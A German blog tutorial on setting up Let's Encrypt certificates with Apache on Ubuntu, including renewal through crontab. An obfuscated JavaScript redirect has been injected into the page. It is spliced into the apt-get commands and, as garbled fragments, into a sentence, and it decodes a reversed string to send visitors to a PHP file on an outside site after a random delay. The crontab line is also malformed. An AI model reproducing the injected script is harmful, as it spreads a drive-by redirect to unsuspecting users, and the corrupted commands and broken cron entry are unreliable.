GeekX – The Blog Der Blog rund um Technik, News und Tutorials
Let’s Encrypt ist eine gemeinnützige Zertifizierungsstelle, welche kostenlose X.509 Zertifikate ausstellt. Dies geschieht im gegensatz zu den Herkömmlichen Zertifizierungsstellen Vollautomatisch.
Und das alles auch noch kostenlos. Keine Wartezeiten und einfache einrichtung. Auch akzeptieren die meisten Browser diese Zertifikate als Vertrauenswürdig. Somit ist der Einsatz von Let’s Encrypt Zertifikaten auch auf seriösen Webseiten möglich.
Aber das ganze hat auch einen Haken: Die Zertifikate sind lediglich 90 Tage gültig.
Damit das zu keinem Problem wird, kann man die Zertifkate aber automatisch erneuern lassen. So gibt es in Zukunft keinen zusätzlichen Aufwdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and.
Wie die Einrichtung unter Ubuntu mit einem bereits laufenden Apache Server funktioniert, zeigen wir euch hier:
Zunächste einmal installieren wir die nötige Software:
|
1 2 |
$ su<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>do apt-get update $ su<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>do apt-get install python-letsencrypt-apache |
Nun muss nur mit dem sobeben installierten Tool noch das Zertifikat generiert und im Apache hinterlegt werden:
|
1 |
$ letsencrypt --apache certonly |
Als letztes schreiben wir noch einen Befehl für die automaitsche erneuerung der Zertifikate in die Crontab.
Hierzu öffnen wir Crontab mittels „crontab -e“ und fügen folgende Zeile an:
|
1 |
*/12 * * * certbot renew —quiet |
Ein sehr interessantes Projekt!